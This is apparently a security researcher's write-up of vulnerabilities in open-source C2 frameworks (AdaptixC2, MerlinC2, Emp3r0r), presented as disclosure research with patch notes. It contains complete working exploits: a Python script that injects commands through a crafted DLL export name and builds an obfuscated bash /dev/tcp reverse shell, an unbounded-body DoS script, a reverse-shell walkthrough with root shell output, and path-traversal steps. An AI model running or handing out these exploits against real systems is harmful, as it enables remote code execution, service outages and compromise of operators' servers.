Bugs in C2s

hehehaha

Motivation

I've been dabbling with c2s in the past year, using it mainly for various labs and certifications and happened to chance upon this article which talks about vulnerabilities in open-source C2s.

With the increase in number of open-source C2s these days and new contenders such as Adaptix, I decided to take a closer look at a few open-source implementations to better understand their design and see if any potential security issues stood out.

Focus Areas

With reference to IncludeSecurity's blogpost, here are the bug classes I focused on while exploring open-source C2s.

Relationship	Example
Third Party -> Teamserver	An unauthenticated attacker is able to achieve arbitrary file write/read on the teamserver's host.
Agent -> Teamserver	An agent sends a untrusted input to the teamserver, allowing arbitrary file write on the teamserver's host.
Operator -> Teamserver	A low-privileged operator is able to send an untrusted input to the teamserver, resulting in remote code execution on the teamserver's host.

List of C2s I reviewed

Here are a list of the open-source C2 frameworks i explored. I mainly filtered them by seeing if they had any commit activity in the past year (2025).

Name	Language
AdaptixC2	Golang
MerlinC2	Golang
Emp3r0r	Golang
XieBroC2	Golang/C#

All of the bugs were reported to the repository owners except for XieBroC2.

AdaptixC2

AdaptixC2 is the latest kid on the block with over 2.1k stars on GitHub as of January and in active development. It boasts a sleek UI similar to CobaltStrike and plenty of tools for customizing various components of the C2 such as AxScript and ExtensionKit.

I found the documentation to be super detailed with each core feature explained clearly.

As if the documentation is not enough, there is plenty of videos and articles on AdaptixC2 here if you are interested.

As for the code itself, I did not spot any obvious security issues with obvious segmentation between the agent and teamserver. However, i did two instance of unsafe sinks (E.g Exec.Command) in the gopher and beacon agent respectively with one of it being exploitable.

Authenticated Operator-To-Server RCE (<= v1.0)

Overview

As per Adaptix's documentation, beacons can be generated with the following formats (EXE, DLL, Service Executable, Shellcode).

In the DLL path, the sideloading workflow mirrors export names into linker flags without sanitization, letting a crafted DLL name inject shell metacharacters and execute arbitrary commands on the teamserver during agent generation.

Analysis of Vulnerable Code

Looking at AdaptixServer/extenders/beacon_agent/pl_sideloading.go, the DLL name is extracted from PE export directory directly without sanitization as seen in (1).

// AdaptixServer/extenders/beacon_agent/pl_sideloading.go
func getDLLName(file *pe.File, exportDir *ExportDirectory) (string, error) {
	nameSection := findSectionByRVA(file, exportDir.NameRVA)
	if nameSection == nil {
		return "", fmt.Errorf("dll name section not found")
	}

	data, err := nameSection.Data()
	if err != nil {
		return "", fmt.Errorf("failed to read dll name section: %v", err)
	}

	offset := exportDir.NameRVA - nameSection.VirtualAddress
	if offset >= uint32(len(data)) {
		return "", fmt.Errorf("dll name offset out of bounds")
	}

  // (1) No sanitization done on nameBytes[:i]
	nameBytes := data[offset:]
	for i, b := range nameBytes {
		if b == 0 {
			return string(nameBytes[:i]), nil
		}
	}
	return "", fmt.Errorf("dll name not null-terminated")
}

This is then procesesed in getExports which saves this unsanitized string into dllName as seen in (2). Subsequently, this is used to create file path in defFileName in (3).

// AdaptixServer/extenders/beacon_agent/pl_sideloading.go
func getExports(file *pe.File) ([]string, string, error) {
    <snip>
  // (2) processed and saved into dllName
	dllName, err := getDLLName(file, exportDir)
	if err != nil {
		return nil, dllName, fmt.Errorf("DLL name not found")
	}
    <snip>
	return exports, dllName, nil
}
func CreateDefinitionFile(content []byte, tempDir string) (string, error) {
	reader := bytes.NewReader(content)
	file, err := pe.NewFile(reader)
	if err != nil {
		return "", fmt.Errorf("Failed to open DLL: %v", err)
	}
	defer file.Close()

	exports, dllName, err := getExports(file)
	if err != nil {
		return "", fmt.Errorf("Failed to read exports: %v", err)
	}
	if len(exports) == 0 {
		return "", fmt.Errorf("No exports found in DLL")
	}

	baseName := strings.TrimSuffix(dllName, filepath.Ext(dllName))
	// (3) unsanitized in path
	defFileName := tempDir + "/" + baseName + ".def" 
	defFile, err := os.Create(defFileName)
	if err != nil {
		return "", fmt.Errorf("Failed to create def file: %v", err)
	}
	defer defFile.Close()

	fmt.Fprintf(defFile, "EXPORTS\n")
	for i, exportName := range exports {
		fmt.Fprintf(defFile, "%s=%s.%s @%v\n", exportName, baseName, exportName, i+1)
	}

	return defFileName, nil
}

Finally, this value is appended to the linker flags and, via string formatting, is passed into the vulnerable exec.Command sink as seen in (4), (5) and (6).

// AdaptixServer/extenders/beacon_agent/pl_agent.go
if generateConfig.Format == "Exe" {
    Files += ObjectDir + "/main" + Ext
    buildPath = tempDir + "/file.exe"
    Filename += ".exe"
} else if generateConfig.Format == "Service Exe" {
    Files += ObjectDir + "/main_service" + Ext
    buildPath = tempDir + "/svc.exe"
    Filename = "svc_" + Filename + ".exe"
} else if generateConfig.Format == "DLL" {
    Files += ObjectDir + "/main_dll" + Ext
    lFlags += " -shared"
    buildPath = tempDir + "/file.dll"
    Filename += ".dll"
    if generateConfig.IsSideloading {
        sideloadingContent, err := base64.StdEncoding.DecodeString(generateConfig.SideloadingContent)
        if err != nil {
            return nil, "", errors.New("unknown sideloading DLL format")
        }
        // defPath is not sanitized and concatenated to lFlags
        defPath, err := CreateDefinitionFile(sideloadingContent, tempDir)
        if err != nil {
            return nil, "", err
        }
        // (4) concatenated into linker Flags
        lFlags += " " + defPath
    }
} else if generateConfig.Format == "Shellcode" {
    Files += ObjectDir + "/main_shellcode" + Ext
    lFlags += " -shared"
    buildPath = tempDir + "/file.dll"
    Filename += ".bin"
} else {
    _ = os.RemoveAll(tempDir)
    return nil, "", errors.New("unknown file format")
}
// (5) string formatting 
cmdBuild := fmt.Sprintf("%s %s %s -o %s", Compiler, lFlags, Files, buildPath)
// (6) passed to a vulnerable sink
runnerCmdBuild := exec.Command("sh", "-c", cmdBuild)

POC

Assuming we have operator level access, we will need the following to gain RCE on the teamserver. We can take a look at Adaptix's Web API to gain a better understanding of what we need.

Requirements

1. A listener of any sorts

   1. RegName and Name of the beacon

2. A valid operator account

We can craft a simple python3 script to do the following:

1. Login and get authorization token at /login

2. Get listener config (optional as operators can just view it on GUI)

3. Craft a request to /agent/generate with our malicious dll

Here is the associated poc script and video that demonstrates this vulnerability.

#!/usr/bin/env python3
import argparse
import base64
import json
import struct
import sys
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class AdaptixExploit:
    def __init__(self, host, port=4321, endpoint="/endpoint", verify_ssl=False):
        self.base_url = f"https://{host}:{port}{endpoint}"
        self.session = requests.Session()
        self.session.verify = verify_ssl
        self.token = None

    def login(self, password, username="attacker"):
        try:
            url = f"{self.base_url}/login"
            resp = self.session.post(url, json={"username": username, "password": password, "version": "1.0"})
            if resp.status_code == 200 and "access_token" in resp.json():
                self.token = resp.json()["access_token"]
                return True
        except Exception as e:
            print(f"[-] Login error: {e}")
        return False

    def get_listeners(self):
        try:
            resp = self.session.get(f"{self.base_url}/listener/list", headers={"Authorization": f"Bearer {self.token}"})
            return resp.json() if resp.status_code == 200 else []
        except:
            return []

    def build_dll(self, cmd):
        # Malicious export name with command injection
        name = f"pwned;{cmd};.dll\x00".encode('ascii')
        pe = bytearray(0x400)
        
        # DOS & PE Headers
        pe[0:2] = b'MZ'
        struct.pack_into('<H', pe, 0x3C, 0x40)
        pe[0x40:0x44] = b'PE\x00\x00'
        
        # COFF & Optional Headers
        struct.pack_into('<H', pe, 0x44, 0x8664)
        struct.pack_into('<H', pe, 0x46, 1)
        struct.pack_into('<H', pe, 0x54, 0xF0)
        struct.pack_into('<H', pe, 0x56, 0x2022)
        struct.pack_into('<H', pe, 0x58, 0x20B)
        struct.pack_into('<B', pe, 0x5A, 14)
        struct.pack_into('<I', pe, 0x5C, 0x200)
        struct.pack_into('<I', pe, 0x60, 0x200)
        struct.pack_into('<I', pe, 0x68, 0)
        struct.pack_into('<I', pe, 0x6C, 0x1000)
        struct.pack_into('<Q', pe, 0x70, 0x180000000)
        struct.pack_into('<I', pe, 0x78, 0x1000)
        struct.pack_into('<I', pe, 0x7C, 0x200)
        struct.pack_into('<H', pe, 0x80, 6)
        struct.pack_into('<H', pe, 0x88, 6)
        struct.pack_into('<I', pe, 0x90, 0x3000)
        struct.pack_into('<I', pe, 0x94, 0x200)
        struct.pack_into('<H', pe, 0x9C, 3)
        struct.pack_into('<H', pe, 0x9E, 0x160)
        struct.pack_into('<Q', pe, 0xA0, 0x100000)
        struct.pack_into('<Q', pe, 0xA8, 0x1000)
        struct.pack_into('<Q', pe, 0xB0, 0x100000)
        struct.pack_into('<Q', pe, 0xB8, 0x1000)
        struct.pack_into('<I', pe, 0xC4, 16)

        # Data Directories (Export)
        struct.pack_into('<I', pe, 0xC8, 0x1000)
        struct.pack_into('<I', pe, 0xCC, 0x100)

        # .edata Section Header
        pe[0x148:0x150] = b'.edata\x00\x00'
        struct.pack_into('<I', pe, 0x150, 0x200)
        struct.pack_into('<I', pe, 0x154, 0x1000)
        struct.pack_into('<I', pe, 0x158, 0x200)
        struct.pack_into('<I', pe, 0x15C, 0x200)
        struct.pack_into('<I', pe, 0x16C, 0x40000040)

        # Export Directory Table
        base = 0x200
        struct.pack_into('<I', pe, base + 12, 0x1034)  # Name RVA
        struct.pack_into('<I', pe, base + 16, 1)       # Base
        struct.pack_into('<I', pe, base + 20, 1)       # NumFuncs
        struct.pack_into('<I', pe, base + 24, 1)       # NumNames
        struct.pack_into('<I', pe, base + 28, 0x1028)  # AddrFuncs
        struct.pack_into('<I', pe, base + 32, 0x102C)  # AddrNames
        struct.pack_into('<I', pe, base + 36, 0x1030)  # AddrOrdinals

        # Export Tables
        struct.pack_into('<I', pe, 0x228, 0x1000)      # Function RVA
        struct.pack_into('<I', pe, 0x22C, 0x1034 + len(name)) # Name Pointer RVA
        struct.pack_into('<H', pe, 0x230, 0)           # Ordinal

        # Strings
        pe[0x234:0x234+len(name)] = name
        func = b"DllMain\x00"
        pe[0x234+len(name):0x234+len(name)+len(func)] = func

        return bytes(pe)

    def run(self, listener, l_type, cmd):
        if not self.token: return False
        
        dll = base64.b64encode(self.build_dll(cmd)).decode()
        conf = {
            "os": "windows", "arch": "x64", "format": "DLL", "sleep": "5s",
            "jitter": 0, "is_sideloading": True, "sideloading_content": dll
        }
        
        data = {
            "listener_name": listener, "listener_type": l_type, 
            "agent": "beacon", "config": json.dumps(conf)
        }
        
        try:
            r = self.session.post(f"{self.base_url}/agent/generate", 
                                headers={"Authorization": f"Bearer {self.token}"}, json=data)
            print(f"[*] Payload sent. Status: {r.status_code}")
            return r.status_code == 200 or r.json().get('ok')
        except Exception as e:
            print(f"[-] Exploit failed: {e}")
            return False

def rev_shell(lhost, lport):
    pad = ""
    while True:
        payload = f"{pad}bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
        b64 = base64.b64encode(payload.encode()).decode()
        ## we need to do this to avoid '/' characters in base64
        if '/' not in b64:
            return f"echo {b64}|base64 -d|bash".replace(" ", "${IFS}")
        pad += " "

if __name__ == "__main__":
    p = argparse.ArgumentParser()
    p.add_argument("--host", default="127.0.0.1")
    p.add_argument("--password", default="pass")
    p.add_argument("--listener", required=True)
    p.add_argument("--type", dest="l_type", required=True)
    p.add_argument("--lhost", default="192.168.125.128")
    p.add_argument("--lport", default=1234)
    args = p.parse_args()

    exp = AdaptixExploit(args.host)
    if exp.login(args.password):
        print(f"[+] Logged in. Targets: {[l.get('l_name') for l in exp.get_listeners()]}")
        print(f"Waiting for reverse shell on {args.lhost}:{args.lport}...")
        exp.run(args.listener, args.l_type, rev_shell(args.lhost, args.lport))
    else:
        print("[-] Login failed.")

The vulnerable code was patched in this commit which passes arguments as an array instead of the vulnerable sh -c.

Unauthenticated DoS via Unbounded Request Body Read (<= v1.0)

Overview

The HTTP beacon listener (AdaptixServer/extenders/beacon_listener_http/pl_http.go) reads the entire request body with io.ReadAll which has no limit. No authentication or session key is enforced at the HTTP layer. This allows an attacker tosend an arbitrarily large or endless body to exhaust memory/CPU, causing a DoS on the teamserver.

Analysis of Vulnerable Code

The vulnerable code lies in AdaptixServer/extenders/beacon_listener_http/pl_http.go, where after a series of operations, the teamserver uses io.ReadAll to read the request body.

func (handler *HTTP) parseBeatAndData(ctx *gin.Context) (string, string, []byte, []byte, error) {
	var (
		beat           string
		agentType      uint
		agentId        uint
		agentInfoCrypt []byte
		agentInfo      []byte
		bodyData       []byte
		err            error
	)

	params := ctx.Request.Header.Get(handler.Config.ParameterName)
	if len(params) > 0 {
		beat = params
	} else {
		return "", "", nil, nil, errors.New("missing beat from Headers")
	}

	agentInfoCrypt, err = base64.StdEncoding.DecodeString(beat)
	if len(agentInfoCrypt) < 5 || err != nil {
		return "", "", nil, nil, errors.New("failed decrypt beat")
	}

	encKey, err := hex.DecodeString(handler.Config.EncryptKey)
	if err != nil {
		return "", "", nil, nil, errors.New("failed decrypt beat")
	}
	rc4crypt, errcrypt := rc4.NewCipher(encKey)
	if errcrypt != nil {
		return "", "", nil, nil, errors.New("rc4 decrypt error")
	}
	agentInfo = make([]byte, len(agentInfoCrypt))
	rc4crypt.XORKeyStream(agentInfo, agentInfoCrypt)

	agentType = uint(binary.BigEndian.Uint32(agentInfo[:4]))
	agentInfo = agentInfo[4:]
	agentId = uint(binary.BigEndian.Uint32(agentInfo[:4]))
	agentInfo = agentInfo[4:]
        // Reads without bound
	bodyData, err = io.ReadAll(ctx.Request.Body)
	if err != nil {
		return "", "", nil, nil, errors.New("missing agent data")
	}

	return fmt.Sprintf("%08x", agentType), fmt.Sprintf("%08x", agentId), agentInfo, bodyData, nil
}

POC

To exploit this, we need to spoof a minimal packet that the listener will accept. This can be extracted out from a compromised agent using a script such as this.

• HTTP method must match listener HttpMethod (commonly POST).

• Path must exactly equal configured Uri (e.g., /endpoint).

• User-Agent must exactly match UserAgent in config.

• Host must equal host_header if set; otherwise any Host passes.

• Heartbeat header named as hb_header (default X-Beacon-Id) with base64 that decodes to at least 8 bytes; content is not otherwise validated before the body read

Below is the POC and a video demonstrating the exploit.

#!/usr/bin/env python3

import argparse
import base64
import socket
from typing import Optional

DEFAULT_BEAT = base64.b64encode(b"\x00" * 8).decode()  # >=8 decoded bytes


def open_connection(host: str, port: int) -> socket.socket:
    return socket.create_connection((host, port), timeout=10)


def build_request(method: str, host: str, port: int, path: str,
                  header_name: str, beat_value: str, user_agent: str,
                  content_length: int, use_chunked: bool,
                  host_header: Optional[str]) -> bytes:
    host_value = host_header or f"{host}:{port}"
    headers = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host_value}",
        f"User-Agent: {user_agent}",
        f"{header_name}: {beat_value}",
    ]
    if use_chunked:
        headers.append("Transfer-Encoding: chunked")
    else:
        headers.append(f"Content-Length: {content_length}")
    headers.extend([
        "Content-Type: application/octet-stream",
        "",
        "",
    ])
    return "\r\n".join(headers).encode()


def stream_body(sock: socket.socket, limit_bytes: Optional[int], chunk_size: int,
                use_chunked: bool) -> int:
    sent = 0
    while limit_bytes is None or sent < limit_bytes:
        size = chunk_size if limit_bytes is None else min(chunk_size, limit_bytes - sent)
        if use_chunked:
            sock.sendall(f"{size:x}\r\n".encode())
        sock.sendall(b"A" * size)
        if use_chunked:
            sock.sendall(b"\r\n")
        sent += size
        if sent and sent % (50 * 1024 * 1024) == 0:
            print(f"sent {sent // (1024 * 1024)} MB")
    if use_chunked and limit_bytes is not None:
        sock.sendall(b"0\r\n\r\n")
    return sent


def run_attack(args: argparse.Namespace) -> None:
    path = args.uri if args.uri.startswith("/") else f"/{args.uri}"
    beat_value = args.beat or DEFAULT_BEAT
    use_chunked = args.chunked or args.forever
    limit_bytes = None if args.forever else args.size_mb * 1024 * 1024

    sock = open_connection(args.host, args.port)
    req = build_request(args.method, args.host, args.port, path,
                        args.header_name, beat_value, args.user_agent,
                        limit_bytes or 0, use_chunked, args.host_header)
    sock.sendall(req)

    mode = "chunked continuous stream" if args.forever else (
        "chunked" if use_chunked else "Content-Length"
    )
    print(f"{'Streaming indefinitely' if args.forever else f'Sending {args.size_mb} MB'} "
          f"using {mode} to http://{args.host}:{args.port}{path}")

    try:
        sent = stream_body(sock, limit_bytes, args.chunk_kb * 1024, use_chunked)
        print(f"Finished after {sent // (1024 * 1024)} MB")
    except KeyboardInterrupt:
        print(f"Stopped at {sent // (1024 * 1024)} MB")
    sock.close()


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="Trigger AdaptixC2 HTTP DoS via unbounded io.ReadAll",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument("--host", required=True, help="Target host")
    parser.add_argument("--port", type=int, default=8080, help="Target port")
    parser.add_argument("--uri", default="/beacon", help="Listener URI path")
    parser.add_argument("--method", default="POST", help="HTTP method configured on the listener")
    parser.add_argument("--header-name", default="X-Beacon-Id",
                        help="Heartbeat header name (hb_header in listener config)")
    parser.add_argument("--host-header",
                        help="Override Host header value (must match listener host_header if set)")
    parser.add_argument("--beat", help="Base64 heartbeat value (>=8 decoded bytes). "
                        "If unset, uses 8 null bytes.")
    parser.add_argument("--user-agent", default="Mozilla/5.0", help="Expected User-Agent")
    parser.add_argument("--size-mb", type=int, default=200, help="Payload size to stream (MB)")
    parser.add_argument("--chunk-kb", type=int, default=64, help="Chunk size to send (KB)")
    parser.add_argument("--chunked", action="store_true",
                        help="Use Transfer-Encoding: chunked instead of Content-Length")
    parser.add_argument("--forever", action="store_true",
                        help="Keep streaming indefinitely (implies chunked, ignores size)")
    return parser.parse_args()


if __name__ == "__main__":
    run_attack(parse_args())

MerlinC2

MerlinC2 is a C2 framework that prioritizes HTTP/2 and HTTP/3 (QUIC) as its primary transport. It also offers server support on all three platforms (MacOS, Windows and Linux) which I thought was pretty cool.

It seem to be in active development with a commit in the last 9 months and having over 5.5k stars on Github.

Authenticated Operator-To-Server RCE (<= 2.1.4)

Overview

Merlin C2 has integrated SharpGen Support which accepts operator-controlled input for dotnetbin and sharpgenbin parameters, which are subsequently passed directly to exec.Command() without validation.

This allows any authenticated operator to obtain RCE with a few additional steps on the teamserver which usually is run with root privileges.

Analysis of Vulnerable Code

As an operator, we can control all the option values as seen in (1)

if m.Extended {
   optionsMap := make(map[string]string)
   for _, v := range m.Options {
       // (1) Operator controls ALL option values
       optionsMap[v.Name] = v.Value 
   }
   command, err = getExtendedCommand(m.Name, optionsMap)

The operator controls the entire optionsMap including dotnetbin and sharpgenbin values.

However, it has flawed validation for the arguments dotnetbin and sharpgenbin as only validates the files exist not that they are the expected executables as seen in (1) and (2).

This allows any operators to substitute any executable on the system (E.g /bin/bash, /usr/bin/curl) they want.

// Generate uses .NET core to compile source code and return the assembly as bytes
func Generate(config *Config) error {
	// (1) validates existence of DotNetBin
	_, errStat := os.Stat(config.DotNetBin)
	// Make sure it exists
	if os.IsNotExist(errStat) {
		// Check to see if it is in the PATH
		p, errDotNet := exec.LookPath(config.DotNetBin)
		if errDotNet != nil {
			return fmt.Errorf("unable to find dotnet core executable %s\r\nEnsure .NET Core 2.1 SDK is installed: https://dotnet.microsoft.com/download", config.DotNetBin)
		}
		_, err := os.Stat(p)
		if err != nil {
			return fmt.Errorf("there was an error validating the dotnet executable %s:\r\n%s", p, err)
		}
		config.DotNetBin = p
	}

	// Check that the SharpGen binary exists
	// TODO Build SharpGen binary if it isn't there
	// Check the file path provided in the execute module
	if path.IsAbs(config.SharpGenBin) {
    //(2) validates existence of SharpGenBin
		_, errA := os.Stat(config.SharpGenBin)
		if errA != nil {
			return fmt.Errorf("the provided SharpGen filepath does not exist: %s\r\n%s\r\nBuild SharpGen from it's source directory with: dotnet build -c release", config.SharpGenBin, errA)
		}
	} else {
		dll, err := os.Getwd()
		if err != nil {
			return fmt.Errorf("unable to get current working directory: %s", err)
		}
		// Check Merlin's root directory
		p := path.Join(dll, config.SharpGenBin)
		_, errDLL := os.Stat(p)
		if os.IsNotExist(errDLL) {
			return fmt.Errorf("unable to find SharpGen executable %s\r\n%s\r\nBuild SharpGen from it's source directory with: dotnet build -c release", config.SharpGenBin, errDLL)
		}
		config.SharpGenBin = p
	}

	// Build arguments
	args := []string{config.SharpGenBin}

	if config.Help {
		args = append(args, "--help")
	} else {
		// File
		if config.OutputFile == "" {
			return fmt.Errorf("an output file name must be provided")
		}
		args = append(args, "--file", config.OutputFile)

		// OutputKind
		if config.OutputKind != "" {
			args = append(args, "--output-kind", config.OutputKind)
		}

		// Platform
		if config.Platform != "" {
			args = append(args, "--platform", config.Platform)
		}

		// Optimization
		if config.Optimization {
			args = append(args, "--no-optimization")
		}

		// Assembly Name
		if config.AssemblyName != "" {
			args = append(args, "--assembly-name", config.AssemblyName)
		}

		// SourceFile
		if config.SourceCode != "" {
			args = append(args, "--source-file", config.SourceCode)
		}

		// Class Name
		if config.ClassName != "" {
			args = append(args, "--class-name", config.ClassName)
		}

		// ConfuserEx
		if config.Confuse != "" {
			args = append(args, "--confuse", config.Confuse)
		}

		// Inline Code
		if config.InlineCode != "" && config.SourceCode == "" {
			args = append(args, config.InlineCode)
		}
	}

	// Execute SharpGen - vulnerable sink despite using argument array
	cmd := exec.Command(config.DotNetBin, args...) // #nosec G204 Intended to run this way
	// TODO Need to send back a messages.UserMessage
	if config.Verbose {
		fmt.Println(cmd.String())
	}
	stdOut, err := cmd.CombinedOutput()
	if err != nil {
		return fmt.Errorf("there was an error executing SharpGen: %s", err)
	}
	// TODO Need to send back a messages.UserMessage
	if config.Verbose {
		fmt.Printf("\r\n%s\r\n", stdOut)
	}
	return nil
}

This eventually leads to the vulnerable sink exec.Command, which despite using an argument array, is still vulnerable.

POC

Since the files have to exist on the system, we need to have the following pre-requsites

1. Authenticated Operator

2. At least one connect agent to satisfy the module execution requirements

   1. The host running on the agent has to be Windows as seen from the following code snippet as seen in (1) in module.go

3. Ability to download files from agent to teamserver which is a standard privilege given to operators

Here my kali VM 192.168.125.128 is running the Merlin Teamserver with a spoofed agent (windows).

Merlin» sessions
Merlin»  
               AGENT GUID              | TRANSPORT |   PLATFORM    |   HOST   |       USER        |              PROCESS               | STATUS  | LAST CHECKIN | NOTE  
+-----------+---------------+----------+-------------------+------------------------------------+---------+--------------+-------
  fc8eafc9-20a8-41b4-b8e1-a3774a9e3dab | h2        | windows/amd64 | nicholas | nicholas\Nicholas | merlinAgent-Windows-x64.exe(31560) | Delayed | 0:00:30 ago  |       
  352b02c4-f4fe-4cc4-9c54-0297947854d3 | h2        | windows/amd64 | nicholas | nicholas\Nicholas | merlinAgent-Windows-x64.exe(31656) | Active  | 0:00:17 ago  |   

First, we download the test.sh, transfering the malicious file from the host that the agent is running on to the teamserver.

Merlin» interact 352b02c4-f4fe-4cc4-9c54-0297947854d3
Merlin[agent][352b02c4-f4fe-4cc4-9c54-0297947854d3]» download test.sh
Merlin[agent][352b02c4-f4fe-4cc4-9c54-0297947854d3]»  
[-] 2026-01-10T08:16:38Z Created job qJpFffNHaE for agent 352b02c4-f4fe-4cc4-9c54-0297947854d3 at 2026-01-10T08:16:38Z               

[+] 2026-01-10T08:17:22Z Results for 352b02c4-f4fe-4cc4-9c54-0297947854d3 at 2026-01-10T08:17:22Z                                    

[+] 2026-01-10T08:17:22Z Successfully downloaded file test.sh with a size of 59 bytes from agent 352b02c4-f4fe-4cc4-9c54-0297947854d3 to /home/kali/Desktop/merlinServer-Linux-x64/data/agents/352b02c4-f4fe-4cc4-9c54-0297947854d3/test.sh       

Next we set the following arguments to execute our malicious script.

• Agent: valid agent-id that is on windows

• sharpgenbin: set to where the malicious script is saved on the server.

• dotnetbin: set to /bin/bash

Merlin[modules][windows/x64/csharp/misc/SharpGen]» show options
Merlin[modules][windows/x64/csharp/misc/SharpGen]»  
[i] 2026-01-10T08:27:14Z 
'SharpGen' module options

       NAME       |                                               VALUE                                                | REQUIRED |          DESCRIPTION            
------------------+----------------------------------------------------------------------------------------------------+----------+---------------------------------
  Agent           | 352b02c4-f4fe-4cc4-9c54-0297947854d3                                                               | true     | Agent on which to run module    
                  |                                                                                                    |          | SharpGen                        
  dotnetbin       | /bin/bash                                                                                          | true     | The file path for the "dotnet"  
                  |                                                                                                    |          | core executable. Use just       
                  |                                                                                                    |          | executable name if in PATH      
                  |                                                                                                    |          | variable                        
  sharpgenbin     | /home/kali/Desktop/merlinServer-Linux-x64/data/agents/352b02c4-f4fe-4cc4-9c54-0297947854d3/test.sh | true     | Path to SharpGen DLL            
  help            | false                                                                                              | false    | Show help information           
  file            | output.exe                                                                                         | true     | The output file name (not the   
                  |                                                                                                    |          | path)                           
  dotnet          |                                                                                                    | false    | The Dotnet Framework version    
                  |                                                                                                    |          | to target (net35 or net40)      
  output-kind     |                                                                                                    | false    | The OutputKind to use (dll or   
                  |                                                                                                    |          | console)                        
  platform        |                                                                                                    | false    |  The Platform to use (AnyCpy,   
                  |                                                                                                    |          | x86, or x64)                    
  no-optimization |                                                                                                    | false    | Don't use source code           
                  |                                                                                                    |          | optimization                    
  assembly-name   |                                                                                                    | false    | The name of the assembly to be  
                  |                                                                                                    |          | generated                       
  source-file     |                                                                                                    | false    | The source code to compile      
  class-name      |                                                                                                    | false    | The name of the class to be     
                  |                                                                                                    |          | generated                       
  confuse         |                                                                                                    | false    | The ConfuserEx ProjectFile      
                  |                                                                                                    |          | configuration                   
  code            | Console.WriteLine(Mimikatz.LogonPasswords());                                                      | false    | CSharp code to compile          
  verbose         |                                                                                                    | false    | Show dotnet compilation output  
  spawnto         | C:\WIndows\System32\dllhost.exe                                                                    | true     | The file path to the            
                  |                                                                                                    |          | executable that will be         
                  |                                                                                                    |          | spawned and the shellcode will  
                  |                                                                                                    |          | be injected into                
  args            |                                                                                                    | false    | Arguments for the spawnto       
                  |                                                                                                    |          | process. They will actually be  
                  |                                                                                                    |          | used                            

Merlin[modules][windows/x64/csharp/misc/SharpGen]» run

This results in exec.Command executing the following command line

/bin/bash /home/kali/Desktop/merlinServer-Linux-x64/data/agents/352b02c4-f4fe-4cc4-9c54-0297947854d3/test.sh <snip>

Upon execution, we recieve our reverse shell.

PS C:\Users\xenon\Downloads> .\nc64.exe -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.106.1] from (UNKNOWN) [192.168.106.1] 58807
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# hostname
kali
# ip a
<snip>
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:04:71:c8 brd ff:ff:ff:ff:ff:ff
    inet 192.168.125.128/24 brd 192.168.125.255 scope global dynamic noprefixroute eth0
       valid_lft 926sec preferred_lft 926sec
    inet6 fe80::e82a:4c47:2c86:9ea8/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
<snip>

This remains unpatched as the author intended for "Merlin users have full control over the client and the server".

Emp3r0r

Path Traversal in File Download (<= v3.11.0)

Overview

The operator get --path command is built on GenerateGetFilePaths, which “sanitizes” the requested path with filepath.Clean and then concatenates it with the server download root (live.FileGetDir).

Because filepath.Clean preserves leading ../, a malicious operator (or compromised operator session) can write files outside the intended ~/.emp3r0r/file-get/ directory.

Analysis of Vulnerable Code

// core/internal/cc/base/ftp/file_transfer.go:92-99
// GenerateGetFilePaths generates paths and filenames for GetFile
func GenerateGetFilePaths(file_path string) (write_dir, save_to_file, tempname, lock string) {
    // Doesn't sanitize ../ sequences
    file_path = filepath.Clean(file_path)
    write_dir = fmt.Sprintf("%s%s", live.FileGetDir, filepath.Dir(file_path))
    save_to_file = fmt.Sprintf("%s/%s", write_dir, util.FileBaseName(file_path))
    tempname = save_to_file + ".tmp"
    lock = save_to_file + ".lock"
    return
}

• filepath.Clean only normalizes the string; it does not remove traversal.

• Concatenation with live.FileGetDir means any ../... path (e.g., ../modules/pwn/config.json or ../../../etc/cron.d/evil) becomes ~/.emp3r0r/file-get/../..., letting an operator write outside file-get to arbitrary locations reachable by the user running the teamserver.]

POC

Based on config.go, default files gotten from get are stored based on SetupFilePaths().

func SetupFilePaths() (err error) {
 HOME, err = os.UserHomeDir()
 if err != nil {
  return
 }
 EmpConfigTar = HOME + "/emp3r0r_operator_config.tar.xz"
 // prefix
 Prefix = os.Getenv("EMP3R0R_PREFIX")
 if Prefix == "" {
  Prefix = "/usr/local"
 }
 // eg. /usr/local/lib/emp3r0r
 EmpDataDir = Prefix + "/lib/emp3r0r"
 EmpBuildDir = EmpDataDir + "/build"
 CAT = EmpDataDir + "/emp3r0r-cat"

 if !util.IsExist(EmpDataDir) {
  return fmt.Errorf("emp3r0r is not installed correctly: %s not found", EmpDataDir)
 }
 if !util.IsExist(CAT) {
  return fmt.Errorf("emp3r0r is not installed correctly: %s not found", CAT)
 }

 // set workspace to ~/.emp3r0r
 u, err := user.Current()
 if err != nil {
  return fmt.Errorf("get current user: %v", err)
 }
 EmpWorkSpace = u.HomeDir + "/.emp3r0r"
 FileGetDir = EmpWorkSpace + "/file-get/"
 EmpConfigFile = EmpWorkSpace + "/emp3r0r.json"
 EmpLogFile = EmpWorkSpace + "/emp3r0r.log"
 if !util.IsDirExist(EmpWorkSpace) {
  err = os.MkdirAll(FileGetDir, 0o700)
  if err != nil {
   return fmt.Errorf("mkdir %s: %v", EmpWorkSpace, err)
  }
 }

 // cd to workspace
 err = os.Chdir(EmpWorkSpace)
 if err != nil {
  return fmt.Errorf("cd to workspace %s: %v", EmpWorkSpace, err)
 }

 // Module directories
 ModuleDirs = []string{EmpDataDir + "/modules", EmpWorkSpace + "/modules"}

 return nil
}

Thus, we can do the following to achieve path traversal.

1. On the operator, run cwd to learn the agent’s working directory (e.g., /home/kali/.BurpSuite/.../resources), so you know where to place a source file.

2. Craft a traversal path with ../ to climb out of ~/.emp3r0r/file-get toward your target (e.g., ../../../../../tmp/ThisIsNotSupposedToBeCreated/pwned.txt).

3. On the agent host, create the file at the matching relative path from its CWD (e.g., ../tmp/ThisIsNotSupposedToBeCreated/pwned.txt).

4. In the operator console, run: get --path "../../../../../tmp/ThisIsNotSupposedToBeCreated/pwned.txt".

